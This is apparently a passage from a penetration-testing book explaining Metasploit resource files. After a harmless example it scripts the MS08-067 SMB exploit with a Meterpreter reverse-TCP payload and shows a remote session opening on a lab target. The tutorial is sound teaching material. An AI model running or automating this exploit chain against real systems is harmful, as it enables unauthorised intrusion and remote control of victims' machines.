Resource Files

Resource files are script files that automate commands within msfconsole. They contain a list of commands that are executed from msfconsole and run sequentially. Resource files can greatly reduce testing and development times, allowing you to automate many repetitive tasks, including exploitation.

Resource files can be loaded from msfconsole with the resource command, or they can be passed as a command-line argument with the -r switch.

The simple example shown next creates a resource file that displays our Metasploit version and then loads the sounds plug-in:

root@bt:/opt/framework3/msf3/ echo version > resource.rc 
  root@bt:/opt/framework3/msf3/ echo load sounds >> resource.rc 
  root@bt:/opt/framework3/msf3/ msfconsole -r resource.rc 
 resource (resource.rc)> version
  Framework: 3.7.0-dev.12220
  Console  : 3.7.0-dev.12220
  resource (resource.rc)> load sounds
  [*] Successfully loaded plugin: sounds
  msf >

As you can see at and , the version and load sounds commands are echoed into a text file called resource.rc. This file is then passed to msfconsole at the command line at with the -r switch, and when the file begins to load, the commands are executed at from the resource file.

A more complex resource file might automatically run a particular exploit against a machine in your lab environment. For example, the following listing uses an SMB exploit in a newly created resource file called autoexploit.rc. We set a payload and our attack and target IPs in this one file so that we don’t have to specify these options manually when attempting this exploit.

root@bt:/opt/framework3/msf3/
echo use exploit/windows/smb/ms08_067_netapi > autoexploit.rc
root@bt:/opt/framework3/msf3/ echo set RHOST 192.168.1.155 >> autoexploit.rc
root@bt:/opt/framework3/msf3/
 echo set PAYLOAD windows/meterpreter/reverse_tcp >> autoexploit.rc
root@bt:/opt/framework3/msf3/ echo set LHOST 192.168.1.101 >> autoexploit.rc
root@bt:/opt/framework3/msf3/ echo exploit >> autoexploit.rc
root@bt:/opt/framework3/msf3/ msfconsole
msf > resource autoexploit.rc
resource (autoexploit.rc)> use exploit/windows/smb/ms08_067_netapi
resource (autoexploit.rc)> set RHOST 192.168.1.155
RHOST => 192.168.1.155
resource (autoexploit.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (autoexploit.rc)> set LHOST 192.168.1.101
LHOST => 192.168.1.101
resource (autoexploit.rc)> exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering the vulnerability...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.155:1033)

meterpreter >

Here we specify the resource file within msfconsole, and it automatically runs our specified commands as shown by the output displayed at .

Note

These are just a couple of simple examples. In Chapter 12, you will learn how to use karma, a very large resource file.